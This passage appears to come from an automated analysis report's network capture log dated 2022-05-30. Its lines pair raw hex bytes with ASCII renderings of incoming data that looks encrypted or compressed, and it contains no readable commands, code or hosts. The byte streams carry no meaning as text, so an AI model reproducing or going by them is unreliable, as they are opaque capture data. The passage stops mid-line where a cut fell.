48 b2 ff ec 56 ff bc 6b bf 3f f2 93 d7 6e e2 e4 7a 3c fb fb eb 63 38 bd 75 c9 9a 90 c2 Data Ascii: >!"pa&eOJEMXF0C6XK}m)OFRAy;5g=E\\|85\|MiErq#~HpdShDNqpnMI}B!Q5,e3K{%V@ozo+!&>1LNw=VA.KWaHVk?nz<c8u
2022-05-30 12:45:59 UTC	632	IN	Data Raw: 46 d5 cb 29 f2 66 d3 0e 21 e2 6f 57 9e 07 56 7a f7 36 96 c2 39 52 3c d7 ac 81 ee bb 88 04 de c5 9c 8f a4 60 b5 03 73 3b 98 9b 86 75 8f d9 5c 25 c5 6c 78 c3 c9 df 87 61 38 af 95 9a e3 96 23 32 0f 69 cb 61 ef ce 6d 6e 80 ba 3c 84 c5 f4 6b 8d fe be 6c cd 9a 0a c6 4a b5 7f 44 2e 99 8f 2b 54 1b 19 18 90 bb 89 8f fc 1b d9 29 f7 a9 e7 b3 fd fb e0 6b 0f 75 53 93 ea 9d 45 5d c8 e5 db ed 80 86 0f 26 6d 44 e6 53 6b e8 fe b6 6d 31 74 02 b3 79 c6 d7 8b 8f ef b9 c1 5b a2 b2 98 bc fe 9c 4e 32 56 17 17 f4 4c ae 35 9f 54 36 c3 e8 20 01 97 02 52 e5 17 b1 c0 ce ef 17 29 19 57 b7 92 6f b8 65 24 b5 96 2b 49 35 7f 0e e0 50 1c 39 79 8a 8a e7 8a 1f 8c d4 9f 1d 25 41 94 fd 33 ad fc 3a 23 88 9b 14 a2 75 f2 5d d7 fe 07 6d 5f bc b5 f0 41 86 ba 77 17 53 16 d5 cd 3d f6 ea 7a a8 cc f2 Data Ascii: F)f!oWVz69R<`s;u\%lxa8#2iamn<klJD.+T)kuSE]&mDSkm1ty[N2VL5T6 R)Woe$+I5P9y%A3:#u]m_AwS=z
2022-05-30 12:45:59 UTC	633	IN	Data Raw: dc 30 53 f5 29 ad ef 93 4d 8c cd 81 fb 6e d1 bb 45 fb c9 13 cd 8b 71 c7 e0 90 ae 10 2f cc 52 7c 97 0f db 62 43 25 a8 d6 62 9a c1 c0 40 6a 72 f6 58 f7 3b a3 ec 14 b5 2d 4f ab c8 5e 3d a0 c8 81 c1 fb 0a e1 4c 1e bd 14 d0 03 21 6a 55 f4 c9 ef 78 38 c9 3d ad 06 b6 58 93 82 51 8e 72 dc c6 50 48 a4 13 08 94 70 f4 18 24 d2 88 dd ae 42 17 8c a2 e7 99 d0 5d 6d 67 9d 94 84 28 bb 7b c2 b6 c2 43 89 49 f4 27 ba cd c1 f4 ee 85 b6 70 66 ba 96 75 64 b3 cd 52 79 ea e1 12 17 86 23 1c 2d 0a 68 4b 54 dc 66 6d 59 1f 0f 24 dc d1 b3 49 13 7e ce 3c b6 a0 b8 1e 3d 73 25 cb 6a d1 98 68 14 40 18 26 20 3b 87 be dc ee 9c 8a b0 13 5a 75 dd fd 2c 34 43 9a c9 01 44 b4 d3 08 cd 47 20 d1 c6 d3 2f bd 3d bd 2b 91 59 fd fc 98 44 35 46 b8 e6 0f 25 b8 40 7b 9c 6e cf bd 07 9a e3 17 d3 a9 44 cc Data Ascii: 0S)MnEq/R\|bC%b@jrX;-O^=L!jUx8=XQrPHp$B]mg({CI'pfudRy#-hKTfmY$I~<=s%jh@& ;Zu,4CDG /=+YD5F%@{nD
2022-05-30 12:45:59 UTC	635	IN	Data Raw: b7 41 31 33 10 83 7e fa 24 26 54 fb 7a b8 d6 9e b8 f8 43 b7 f2 b6 48 0d 9d 47 63 33 c4 db ef 21 6d 3d 72 e2 e9 46 e1 ec f7 37 43 6d 2c 2b 35 ff ca 6d ef 37 a5 03 95 f6 4a de 13 a8 87 05 76 90 47 d5 76 b9 79 03 ff 9d 73 4e 1f 10 e4 b2 97 f0 ff 76 96 3b a4 14 cb ed a7 5a c9 bf 2c ef c7 ed 12 42 37 bc 29 c3 01 eb 13 87 fe 46 d3 eb b8 5d 29 25 5a 27 a9 c3 2e bf 49 e4 d5 b5 74 83 11 5e 4e eb 15 61 b1 48 96 90 12 2d 9f 8f b4 de 47 31 ca 98 4c 60 8a e2 34 88 3c 26 43 63 e9 4f dd 0e cb 6c 10 bd e0 67 4d 04 be 9d 53 87 91 ae 91 6e ce 57 ac 03 62 df c1 4e 9c 1e 57 89 02 3c c8 96 ad 44 b2 f6 97 ed 3a 70 48 75 b7 6f 0a cf 8f 62 fa 17 11 1b 19 d7 80 f4 7e 3e 38 e0 1e 9c 71 e1 92 0b 5d 2e c0 76 08 fc c7 60 23 4d f4 05 7e 51 76 7d a6 88 b9 1a 74 89 38 1c be 87 de fb 7a Data Ascii: A13~$&TzCHGc3!m=rF7Cm,+5m7JvGvysNv;Z,B7)F])%Z'.It^NaH-G1L`4<&CcOlgMSnWbNW<D:pHuob~>8q].v`#M~Qv}t8z
2022-05-30 12:45:59 UTC	635	IN	Data Raw: 13 3a 4a 2c df d3 15 aa 01 30 9b 83 a6 1e e0 66 f2 b0 bb f7 9f c7 aa 31 45 03 ba cc b4 b5 07 ee b6 ab b0 f2 c7 ec 6d b0 85 a4 df d8 c0 ac b0 5b ce ad 9b 3b 9e a2 3d 0c ab 20 0f 55 b8 98 6a 3f 3d ea 73 72 e8 ed d3 a1 dc d6 c7 89 49 91 aa b4 89 e8 7b 9e b2 4c 1b c7 a0 1d 05 41 9d 7b 49 2a a6 86 38 26 e7 1a 99 2a 75 dc 3a a4 cb 4b ff d6 0a 8b 82 9e 19 92 5c 8d 55 93 22 ed de 4f 89 3c 5b 15 44 9f 1b 44 42 0f eb 15 5b a3 37 97 da 87 df 53 01 77 35 a7 76 2d b4 e8 6f 6e c1 20 4e 6e 3f 46 16 c4 b3 d9 e7 e2 a0 11 cb b5 05 5b 0b 6b 67 9d a7 bc bc 6a 67 f4 fd 9c e9 59 57 7f 6e bf 85 cb 1a ab 72 eb 1d bb f6 b3 26 c4 28 91 24 70 18 4f e3 ac 88 ef 54 0a 8b ab d4 23 d5 48 d3 f5 a7 f0 87 ec 7d c2 0b 34 d2 74 db 0d b8 5c 44 56 66 ea 17 0d c7 70 d7 2f 80 4e 53 3c 58 9f e8 Data Ascii: :J,0f1Em[;= Uj?=srI{LA{I8&u:K\U"O<[DDB[7Sw5v-on Nn?F[kgjgYWnr&($pOT#H}4t\DVfp/NS<X
2022-05-30 12:45:59 UTC	637	IN	Data Raw: 0b e4 e0 00 3f 1f 84 f8 5b 42 d8 54 92 25 17 22 ed c6 1c e3 d2 9d d0 b5 fb 29 38 0d 6c e9 da 7f 7e 9e 10 81 cd 9e 82 49 81 84 4e e4 70 7f 46 35 b3 80 9a 9e c0 0c 36 1a 11 7e 89 87 0e bd 41 0f 9b 78 34 0d 16 89 86 b2 d0 bd 0e 27 70 5f 96 eb 2d fb 99 23 93 eb fd 81 84 c3 0f ad b8 0d 82 c0 15 bd 47 ae 74 47 63 16 b5 d8 fb fa 1e 3b 89 9f 42 96 e3 51 ba 99 7c ba 39 47 07 65 d4 28 f2 3a 17 17 7b 57 f0 30 e7 3d 1c 4e a4 06 20 02 29 67 67 62 c5 73 15 98 ec 76 38 0b 82 24 cd 84 19 23 b4 9e 1b 49 71 f6 5c 38 4a 6f aa 7b 50 48 6e f6 b0 64 dc 3e 36 b9 79 e8 c7 33 20 35 52 1b 2b bc 6d c8 f8 a6 f2 0d fd 9a 3b ec 67 f4 41 db 7c b5 ff 51 1f 32 fd ae 5f e8 fe f7 77 26 0e 9b 10 1c a6 44 18 fa 3d 34 69 44 2e 53 f4 a1 b8 da 8c d0 c8 32 62 c6 3e 6a a6 33 9d f7 cd bc 7e 68 71 Data Ascii: ?[BT%")8l~INpF56~Ax4'p_-#GtGc;BQ\|9Ge(:{W0=N )ggbsv8$#Iq\8Jo{PHnd>6y3 5R+m;gA\|Q2_w&D=4iD.S2b>j3~hq
2022-05-30 12:45:59 UTC	638	IN	Data Raw: 09 95 d3 ad db 76 c7 1f 3e b4 78 62 f6 d3 30 28 55 3f 95 eb cc 24 22 2c 08 2a 29 8d 42 88 e7 aa 48 d6 c7 f0 bb 5c 97 4c 21 6a 62 7e eb 96 e8 0d c9 b6 6c e2 d6 dc ad 34 1b 06 7a dc ca ea 63 f1 ab d2 ea 54 d0 ca 6e 42 14 d9 ca df 17 f0 99 1c 9a 35 9c fb e2 f7 a1 84 80 1e b4 33 3c a8 d1 d7 ce 1f 44 20 5f b6 d0 ca e5 39 12 cd ed 95 75 3d 9e 0c 53 19 df cf c9 fc 75 c9 72 c7 7d 8f e2 23 df d0 1a 50 9a 4b 5c d6 d1 d4 86 ec 81 7a 9d fa 78 89 46 64 2a 4e 4c f3 95 6b 18 b0 20 c3 4e 04 af fe a6 fb f2 74 be 03 67 e9 d2 0d 6a bb d6 5a cc 05 8e a1 5d 2a 07 f1 ee f2 a5 83 2a d3 46 37 04 f0 1b 69 d1 63 d5 04 f9 55 04 a2 2b c7 c5 a7 76 6a 8f b8 0c f0 41 de 9a b3 56 4d 75 ce 40 5c 5b f5 49 2c 60 eb ea 93 a5 04 1e 4b 26 f9 7b b0 d6 00 1b 9c ec 54 19 2b 08 83 32 bd 91 d9 9c Data Ascii: v>xb0(U?$",)BH\L!jb~l4zcTnB53<D _9u=Sur}#PK\zxFdNLk NtgjZ]**F7icU+vjAVMu@\[I,`K&{T+2
2022-05-30 12:45:59 UTC	639	IN	Data Raw: 29 21 82 e3 c0 49 a6 df 0a 3a 23 8d 3b c7 9b 01 b6 4f a5 03 93 2d 59 71 ee cc 28 66 8d 64 c2 1c 89 47 71 b6 97 f0 2a be 65 51 6d 7c 12 8d c6 a0 01 92 5b 30 ac 3e d3 81 5d c3 27 b1 9c a5 b7 90 5e c9 5b 4e a2 ba 45 d0 20 31 1c 16 e8 45 fc 16 ed 23 22 b6 a9 ca 3c 54 9d bb 85 cc af 91 5c 9d 12 54 8e a7 39 38 74 43 44 d2 2f 40 47 b4 4b 67 b3 b2 23 3e ad 78 e1 aa f8 2d 95 48 65 f7 70 b7 cf 06 a8 13 ab 04 71 76 78 84 6e db 12 76 16 ba 29 f5 e6 5c 11 88 90 1f dd fe e6 f7 9d 79 73 e8 5d 82 00 5b ad 7e 8b 24 6f ca 05 1d d3 1d a1 b6 2a 4e a6 84 2c 5c 0c ef c7 ac eb dc dd 4a d9 38 a2 8e f7 5b 63 fa d9 6b d2 7a 75 ed 7f a8 2d da 7e dc 9a 87 27 ea f1 80 2b 57 36 fa 85 7b 28 9e 48 f4 a1 95 2c c1 d6 bd 1a 4b ff d1 20 f5 f7 05 6c 52 29 bd 5b e9 9a 7c dc f4 e1 ce 0b 6f 0d Data Ascii: )!I:#;O-Yq(fdGqeQm\|[0>]'^[NE 1E#"<T\T98tCD/@GKg#>x-Hepqvxnv)\ys][~$oN,\J8[ckzu-~'+W6{(H,K lR)[\|o
2022-05-30 12:45:59 UTC	641	IN	Data Raw: 78 6f 7f f3 d8 a2 8d 0e 4b 76 cc e2 7c b2 43 9e b8 d9 eb 76 fa 2d c5 3d d4 68 76 c9 61 ed ed ca fa dd 2f cc c6 d6 98 e1 71 d6 58 04 f8 c7 60 1d 9f 6e 58 ae ad 37 57 57 ee 1c 93 a5 80 9c dc 18 d9 e6 b5 11 c3 c5 9a 6d d4 37 6f 4c 5d 67 62 b1 4b 15 98 80 24 ae a9 76 77 32 f0 16 4b 61 19 ca 9b 3e fa c7 b5 06 4b 39 46 8c 3f 4a de d3 b7 1e 72 12 2a 61 11 0b 3c a5 3d 1e 3f 03 ab 35 d6 bc f1 2c 23 6e cb b6 a0 c8 1c 2a 00 4a 30 09 a9 22 43 82 cd 9a 59 33 1f 61 a6 e6 70 ea ec ff 96 5a 53 16 37 67 90 61 ac bc ef 29 70 c2 83 9e ee 19 45 13 f9 af 32 f2 b0 65 43 8f f7 52 14 1e 0c 9e 89 3d 04 ad 65 84 98 3a 97 97 75 13 31 47 4f 4b cc cb 91 b5 6a b6 ef b3 38 e6 98 e8 0d c2 e7 07 d6 91 42 5f 8b 33 ba 76 62 41 3d a0 4c 35 5d 89 a1 88 87 e5 f7 f4 35 fa 7c bf 2f 4d a5 5a 9f Data Ascii: xoKv\|Cv-=hva/qX`nX7WWm7oL]gbK$vw2Ka>K9F?Jra<=?5,#nJ0"CY3apZS7ga)pE2eCR=e:u1GOKj8B_3vbA=L5]5\|/MZ
2022-05-30 12:45:59 UTC	642	IN	Data Raw: 07 d4 18 1b d7 31 21 07 b5 63 04 65 37 b3 56 cc 68 ec 9f 1d c0 a4 b7 9c 72 c8 3d bc 02 bd 57 6b 2c 25 3d fb 6b 79 ed fa e0 28 a6 fe 2f 13 47 f1 e8 09 dc 36 03 01 da ce fc d1 7f 98 dc 59 0b 6e d2 1c 09 fe 58 72 97 30 2c 91 75 95 fd 36 3c 57 4c 73 8d 44 e7 dc 11 93 9b b9 de 38 20 b3 8a d1 54 38 17 b4 f4 1b d6 71 99 f5 b9 30 b3 e0 35 0d 4b d7 a7 a9 b7 47 76 d1 c2 de a7 0c 3e 31 d0 91 56 d1 63 75 83 e4 5f ba 77 c3 3e f2 83 74 95 7f 6a c7 07 a6 a6 09 b1 56 bb b8 a9 4c a3 86 f5 4c 28 0b c4 ce c3 26 33 48 87 c6 fd 73 3b 13 e8 aa f8 27 5b 9c 55 4c a7 12 42 da 56 59 48 5b b9 7e e6 dc 35 b7 bd f3 25 dc 4f 60 ba 0a 60 b8 9b d7 f0 8f 89 81 67 b9 ca c7 3d 7a 80 b9 87 e3 7f ff 2a a1 0c 48 ad 36 b6 64 77 3a af 91 7f f3 53 1e f1 a1 da 70 83 45 a0 f5 43 f5 92 83 03 ea 01 Data Ascii: 1!ce7Vhr=Wk,%=ky(/G6YnXr0,u6<WLsD8 T8q05KGv>1Vcu_w>tjVLL(&3Hs;'[ULBVYH[~5%O``g=z*H6dw:SpEC
2022-05-30 12:45:59 UTC	643	IN	Data Raw: 92 84 4e 30 8e fe f0 7c 52 41 46 88 d2 c6 8a 00 b6 22 b1 4f 15 67 4b 38 48 66 3f 3e 75 fb f8 cd b7 e4 23 dd 0b eb 0a 4c 56 8e 6b 18 ec 7c b0 97 43 e0 c4 5b 81 51 3d 8f c3 31 5e 0c a0 2f 6f 8b bc 6f 80 fd 9a 1a 5e 6a 51 d8 bd 03 c7 80 7f 05 54 06 ae 8c 4f dd ee e6 e7 46 e6 16 f2 79 09 c8 ea ea dd 06 68 c0 16 b4 7a 77 eb ae b6 eb 43 23 22 7f 0b 81 44 97 b0 04 9a 71 e1 ca b3 71 fa 73 26 26 80 5b 40 33 35 27 b8 f2 69 4d ca a6 5d 35 f3 08 ea c9 eb 77 1c b3 0c 7b f4 fa 8b e9 62 23 54 0b df e5 6f c7 4d 33 db fd 26 a7 d9 17 c3 44 36 7d 8e 11 bb 08 bd 35 1f d9 7c 60 3e 36 a9 c8 d5 05 91 58 0a 3d fc e7 dd 1a c7 f8 fc 84 f5 65 4e b9 81 04 2a 8f e0 42 7d f2 e2 e2 de 2f 2d 90 65 96 93 de 01 a9 54 1a 00 26 21 fe 18 af a6 34 53 3f ad 6b cf 76 7c a7 e8 3f 6c 61 9e 94 0f Data Ascii: N0\|RAF"OgK8Hf?>u#LVk\|C[Q=1^/oo^jQTOFyhzwC#"Dqqs&&[@35'iM]5w{b#ToM3&D6}5\|`>6X=eN*B}/-eT&!4S?kv\|?la
2022-05-30 12:45:59 UTC	644	IN	Data Raw: 3d 48 35 48 18 7b bd 1c 8b 54 e4 5d 4e 55 b6 84 d8 33 b6 66 7e 2d bf 36 56 20 bd f2 b0 92 6e f4 9b eb 8d ae ef 50 82 12 66 f6 f8 15 bd fe 12 a1 91 c7 a8 65 77 d2 36 b2 47 70 65 c1 0e 2d a3 42 52 a5 ae f6 13 65 f5 e0 6e 3e 06 34 8e 85 d5 46 ca 16 f2 30 b8 cc da 75 61 1c a6 42 9b 81 2b e0 76 e3 d2 fa c8 57 cb 42 df 7c 61 9a 00 42 4b 7c 59 80 be e0 32 c8 5a f1 f6 e4 ec 99 eb 94 3d bb e4 b1 55 4a 5b c5 ff 10 09 f2 94 3b 0b 78 02 c7 3e 9a 64 9a 1c b2 95 ef cc f2 b6 fa 34 c9 cd 2e b3 c1 33 ba 7e ed 92 f8 a3 4d 29 28 98 f2 54 59 bd 5e 9b f6 d9 b9 af 61 4d 26 fb 39 af 98 83 ca 9b 78 d8 2c a6 87 3c 89 7a a4 22 16 20 cc 59 f1 f5 6f 7c 99 f6 09 40 05 9a e9 1b 09 d3 58 51 b5 7f 37 95 84 c6 16 32 24 c0 df 3b 88 cc 61 c4 f0 4a 2d 3a a6 91 f2 17 a0 6c 22 b6 a9 71 af 1b Data Ascii: =H5H{T]NU3f~-6V nPfew6Gpe-BRen>4F0uaB+vWB\|aBK\|Y2Z=UJ[;x>d4.3~M)(TY^aM&9x,<z" Yo\|@XQ72$;aJ-:l"q
2022-05-30 12:45:59 UTC	646	IN	Data Raw: 7c f7 2d 12 ff c8 99 76 fe c3 3d d4 1d b6 83 d4 4a e9 8a 11 66 96 3c 3c b1 e3 72 e1 d1 e4 29 ea ec 96 90 95 b6 ce fb 34 34 47 94 6f ca c0 8c b7 70 28 b8 79 df ba f8 7b 0c c1 42 e7 c1 4c 54 a4 bf 3c 9a 09 25 4a 4c cc 7c 7c ff ee de b6 b4 f7 2c ee af b3 56 36 7f ce 60 c0 87 68 07 20 03 f4 5b 65 d0 dd 1b ec cd cd 0c 1f 13 47 e3 f0 9c 70 31 22 3b ab 99 45 bd 8e d2 9d d0 a2 fd 77 f4 0b 1d c1 cd 8e c4 c7 49 39 f4 6c 34 1a b9 0a 3e 35 17 9a 46 f9 f8 cb 84 04 37 7f 37 97 45 d1 3d 28 27 55 6f 33 db f1 fb d9 83 fc 0b 98 52 76 73 0e fb 88 4d 37 f5 9e 32 77 ab 60 fa 55 05 46 f9 d8 12 f2 c2 6f 1f bd 22 0d ab 94 17 55 ad 16 e8 7f e8 bf fc ff c6 60 96 90 83 f9 b8 a2 b2 90 dc bb 10 4d 62 71 43 ff 82 81 a9 b5 9a b8 6c 46 1e 2d bd f1 ff 5d 67 e9 ca 1b d1 dc d7 77 7f 3c 49 Data Ascii: \|-v=Jf<<r)44Gop(y{BLT<%JL\|\|,V6`h [eGp1";EwI9l4>5F77E=('Uo3RvsM72w`UFo"U`MbqClF-]gw<I
2022-05-30 12:45:59 UTC	647	IN	Data Raw: 7d 8e 15 21 61 5e 87 85 4f e3 53 77 cd cd c9 1e b4 9b 50 ba c2 80 9c a5 b2 9f 31 e1 96 57 9e d2 00 d4 67 fe 50 c1 a0 e4 2b c8 1f 4c a6 7b 0b 2f 95 30 77 b0 e4 17 35 c5 dd 69 5d b1 23 9e 3a 7f 2f ef db 40 f7 ed 7f 25 81 5a 90 73 32 87 07 e2 fd 78 36 f2 39 7f c0 89 71 c7 a7 01 9d fd 76 86 5f f1 b3 4f 56 bd 8f 56 2e 1e c3 b6 4a 03 85 ed 32 7e 68 89 a4 ce 0b 15 a8 ff 72 8d dc d5 5a e2 19 02 d5 6c 46 42 b8 6d d8 ca 2f 3a ee 02 62 c9 ab 8e f3 7c ed 9a 6a e6 b2 56 07 b6 c6 4e 26 7b 37 00 ab e0 67 99 59 18 f4 bf 9e 4b 25 b4 77 e4 6b f2 62 8b dd d2 d7 b0 8f 68 9b 01 e8 99 74 47 b0 86 67 bd 76 06 ed b5 fc e6 d8 e1 d8 e6 73 ac f3 8d fe 28 3f f4 0c c1 e8 e1 12 1f 03 66 b3 2d 21 c6 34 55 36 2f 5e d2 b3 a6 98 d3 39 9f 3a b8 a5 0d 9d 78 02 94 5d b4 37 a9 8f 9c 7d 90 19 Data Ascii: }!a^OSwP1WgP+L{/0w5i]#:/@%Zs2x69qv_OVV.J2~hrZlFBm/:b\|jVN&{7gYK%wkbhtGgvs(?f-!4U6/^9:x]7}
2022-05-30 12:45:59 UTC	648	IN	Data Raw: 50 bc 13 f0 9d c3 75 f0 59 83 14 d5 46 c4 9e da d7 14 04 ea 70 61 99 66 bb d7 cf e0 31 db 7c e8 7f 37 a9 8a ea 01 d7 ba 71 83 27 a2 1e 81 b8 46 68 6e ec 42 f7 69 a5 ec b4 91 0c fb f6 f4 3c 8a 2a 6b b7 fd c0 48 91 55 c6 80 24 ad ab 91 76 04 21 e5 39 22 ef cd f2 3d 90 4f 0a 0a 42 7a dd 33 ba 7e 6a 3d f6 29 d6 c1 28 98 79 8c 06 3a 1d 3c 94 2d 94 84 e2 b5 5a 0c 43 ac 1f 55 ca 10 33 82 92 0e cf 1c 02 3c 3a f9 1f 51 28 b1 e0 ef ae 9c 11 8f c6 a0 01 24 de 62 83 e3 19 56 74 b6 70 38 18 0a b3 c9 db 3f bf cc 8a 3c 61 24 75 bc 58 b9 58 36 5c fe 2e 6c af fa 06 1a ef 78 8d 2f 73 c3 a1 eb 07 18 e4 d6 48 76 68 6f f9 9c e4 de 50 88 af 6b 93 2b 97 2d 12 87 f7 c6 d6 d3 6c c0 76 4f 0f 72 6e b8 3e db b3 bc 5b 67 2f 91 90 d7 39 8c 14 c2 6b 8b fc 8e ad fd 1e da 1d 4b 74 fa 4f Data Ascii: PuYFpaf1\|7q'FhnBi<*kHU$v!9"=OBz3~j=)(y:<-ZCU3<:Q($bVtp8?<a$uXX6\.lx/sHvhoPk+-lvOrn>[g/9kKtO
2022-05-30 12:45:59 UTC	649	IN	Data Raw: d3 25 8d a6 5a ab 08 b9 f6 30 3f 42 f8 22 d3 f7 36 a0 ce 2b d9 9a a5 28 46 45 ab 47 ec 1e 84 a5 f2 d3 9f b3 7b 07 1c 73 17 7e 16 f0 df 65 f9 5e 2a 59 d1 71 9a d5 9d d0 79 bb 8d dd 12 e7 3e b9 ca dc 24 17 ba 0a 66 0b 8a ba bd 87 0c e8 ee 7f 21 3d f6 21 f4 4d f3 69 c9 18 01 f8 55 00 06 3a 65 10 0c 9b e5 18 95 78 01 d8 0f 5e 60 7e 53 b2 0b 66 6f 52 43 93 9f 4f 8e a9 62 e5 53 b9 a4 de 6f 41 c9 de 79 34 4f f4 de 0b a7 03 04 e1 4f 20 9f 42 a0 ef 7b c8 a9 7c b6 39 dc 73 fa 91 94 0a 49 41 ff 3e 6f 56 4a 48 11 f2 c5 ea 22 38 ea 15 44 ec ac a6 31 da 23 28 88 32 28 20 9f b9 a8 19 37 26 d1 4b aa 37 7c 5d b5 06 ce 72 e6 12 26 e3 b8 73 1f 82 9a f9 aa 91 94 a4 d8 25 00 4d c0 fc ab 1f af a3 65 fc 02 63 82 85 60 80 67 e8 d4 cd b5 3c 59 9a 62 9a cd 00 c2 7b 3e 88 a0 b0 fb Data Ascii: %Z0?B"6+(FEG{s~e^*Yqy>$f!=!MiU:ex^`~SfoRCObSoAy4OO B{\|9sIA>oVJH"8D1#(2( 7&K7\|]r&s%Mec`g<Yb{>
2022-05-30 12:45:59 UTC	651	IN	Data Raw: ed 23 c9 6b 72 e0 ba 6a 90 fe e1 1f b4 c5 97 4c 8f ce 3c 4a af 66 c6 f4 ae 8a 60 2e c3 d6 b2 13 17 da e1 ab ad 3b 76 93 9b c1 c0 3b 3b 11 34 1f 64 4f bc 78 b2 87 95 c7 aa 00 df b0 4a 48 fd e5 e8 8d 18 c8 85 bd 45 e3 17 e8 02 62 b9 c8 96 86 c7 36 3d 19 7b 27 23 c8 23 a1 8d 36 f8 5b da 2d 20 90 85 d0 54 5a d7 cf 95 9f 6a 50 d9 e9 0f 66 c4 a0 33 18 14 7e ba 88 b8 81 10 b7 48 7f 08 c8 dd 61 f0 26 70 84 ea df 2b e3 a2 de b0 5e d1 51 48 f3 7f db ff 9e 26 c6 5a d3 a7 61 76 ab e6 1d dc 5a f4 1a 7d 3f 0f 7c f7 15 12 ff c8 cd cd d6 c1 d9 2b 96 cd 2a 08 39 6a fb 6b d8 b0 50 3d 3a 20 38 95 f6 b3 ef 9c ff 71 d4 32 1d 21 d4 85 ef a4 47 b4 54 ce aa 2a 90 58 b9 f4 00 22 c7 2a 40 e5 0e 3c 96 e0 26 17 10 f0 48 db c7 d7 61 bc d7 a7 5c 93 cb 17 0a 10 69 de 51 4c dd 4b b6 1c Data Ascii: #krjL<Jf`.;v;;4dOxJHEb6={'##6[- TZjPf3~Ha&p+^QH&ZavZ}?\|+9jkP=: 8q2!GTX"*@<&Ha\iQLK
2022-05-30 12:45:59 UTC	651	IN	Data Raw: e5 b3 1d 40 df aa a6 f0 4b c7 57 01 89 7f a8 ec d0 6b 59 69 39 b1 aa b3 6d 3c 39 7c 31 f4 69 68 de 58 ff ac 44 2b 15 0b c5 42 25 07 f7 61 39 e1 8d 8d 48 fe 87 f5 79 98 93 c1 f8 9b de 48 98 b1 12 c6 af e8 43 bd 90 52 e7 19 a7 cc 08 b7 59 a1 a7 5c 3d bd 89 49 03 4e 0a fe fb a1 cc 7c 3c e4 6e f1 cb 0c ca 6d cb cb 2e 3a ee 80 ae 3c df 81 87 b1 f7 3f 97 26 2b ab cf 2f 3b 85 bf c6 81 5f e1 4c 57 85 d0 54 78 94 72 e8 60 87 7b 28 29 8c 84 f0 71 7a 16 13 09 9d 55 47 0b 5a ff 57 be 10 36 8a 76 14 6c b7 e0 ce 9f 24 72 65 be 70 2b 16 9c 78 9e 0c 53 05 20 7c de 76 71 a9 56 ba c6 a7 e2 23 a5 8e ae 2c 1e 41 0d d4 39 9f 33 95 84 6d 95 f4 de 94 ea e5 68 4d 8f dc d0 1f 80 c5 6d 6f 6c ab 41 32 12 88 dd 63 c6 fa ec 30 da 94 7e f3 56 57 47 8a 67 4b 0a 35 f8 b8 b8 f1 50 19 9b Data Ascii: @KWkYi9m<9\|1ihXD+B%a9HyHCRY\=IN\|<nm.:<?&+/;_LWTxr`{()qzUGZW6vl$rep+xS \|vqV#,A93mhMmolA2c0~VWGgK5P
2022-05-30 12:45:59 UTC	653	IN	Data Raw: 7d 9f a1 4f d2 cf 33 62 68 6e 6c 0e cc 43 d8 fc bc 55 f7 4f 14 3e be 61 76 33 34 fb b9 ae 6e 4f af 97 ad cc d2 01 d8 19 7f d1 24 3e 80 b4 5b ce a1 9b fb 8f f1 66 fa 15 85 bf b9 cc 0f db 24 01 6d 3d 7c 6c c6 46 ac 98 f2 df 81 f5 f7 c8 85 ca e8 89 ea 9d 2e cd 2e da 1d 55 ca 1e b8 fb 15 ae 2f 68 60 84 20 f9 56 37 ef 71 33 0d 44 a1 99 48 86 ce 9c 53 3b 08 05 2a 7c 41 3c 1a 57 a5 a5 28 39 8a 50 3e df 33 8a 73 96 3f fe 71 8b d2 ef e8 a7 ba 0a 7c a9 fa 06 26 9a 6f 6e c1 7c 4a 56 3f 4e 14 13 5a 0c b3 e2 2b dd 03 20 73 e8 ac b3 e2 5c 43 a7 02 d5 1b 3f 78 e8 d1 77 c8 81 c3 23 76 bd af 7f a9 f9 13 b5 67 ff 63 6f 28 5d 1b c4 dd 10 bd f5 5a 2a 8f c9 78 c7 94 a9 3f 34 a9 82 a5 e9 b8 9b 30 9f b7 1c 24 63 d7 1f c5 a3 c1 96 9e 91 32 2a c7 b1 0f bd 80 ce b7 c8 52 33 9a 6f Data Ascii: }O3bhnlCUO>av34nO$>[f$m=\|lF..U/h` V7q3DHS;\|A<W(9P>3s?q\|&on\|JV?NZ+ s\C?xw#vgco(]Zx?40$c2*R3o
2022-05-30 12:45:59 UTC	654	IN	Data Raw: e2 7a a9 43 79 70 6b f6 7d d8 d1 d9 a8 a5 2c 4f c1 72 43 5f d9 f4 e2 26 8d f0 1d e7 3e b9 f5 6d 1b e6 cf 4e 68 3c e6 4a 0e 0d 40 cc 75 32 1d 4c ac 99 12 3f 48 12 87 ce 8d f1 e4 24 5f 6f 33 10 88 e6 78 65 0a d1 53 8a 74 66 2b eb 60 79 64 e5 13 fb 1f b7 fb f5 89 22 33 20 53 b9 a4 b2 0c b4 15 35 05 d9 31 e0 ed ab c2 fd de 4e 58 1e 33 38 9f 1b 23 13 bd b0 fc 47 6f a8 63 50 e4 0e bd 42 e2 0f 58 24 f9 35 78 dd 8f 1d dd c7 67 b2 79 27 8a 0d ca ce 23 5a 3b 62 1c d4 4d c7 84 19 43 63 4a 11 30 6a fc 99 d5 c5 ca 5e 13 01 73 6e a5 6e c2 06 f9 e8 2a 48 17 82 3b 21 b7 9a 7d 07 54 41 c1 15 9f 56 c4 92 b9 b2 a0 43 61 ed e0 16 e5 72 98 77 52 85 cb 0d f6 c6 a7 71 ac c2 5c 31 91 32 eb 4f a5 63 69 bf 4b ce ff 37 22 c1 12 e7 70 61 9a 6a d8 5a f9 99 48 3c ea 36 c8 5a 29 cc a9 Data Ascii: zCypk},OrC_&>mNh<J@u2L?H$_o3xeStf+`yd"3 S51NX38#GocPBX$5xgy'#Z;bMCcJ0j^snn*H;!}TAVCarwRq\12OciK7"pajZH<6Z)
2022-05-30 12:45:59 UTC	655	IN	Data Raw: 21 eb 78 64 2f e2 19 09 3f 56 2a 11 be 20 9e 78 c0 af 6c 0b c1 fa 2a 0a a2 1e 38 44 4c 68 f3 b8 6b 3e fb ae 3f 01 4e 59 44 7f cc 57 6a 0a 35 89 35 00 26 99 13 bb 49 76 4d 69 a6 1d 82 ea 5b a8 7d e3 94 90 78 18 09 a2 88 ff cc e0 34 16 ff 06 b5 e4 2b 89 57 6b c4 bb 6b 2a 48 7f 03 80 0a bb d5 f1 49 a4 49 25 65 a6 07 71 1f 28 6a f6 5d 1b b9 20 85 b3 d8 31 30 4a e1 12 ab 5a 75 9e e5 5a 7f 68 da 66 8a 29 a6 3d 1c 7b 13 42 a6 2f 3d 58 d0 2e fd 33 4e 44 5e 89 1f 6c af fe 4b c9 3b 73 c2 84 88 65 66 74 0d 70 05 a2 36 89 4b c2 19 24 b8 fc b4 a3 d4 20 b7 6a 0c 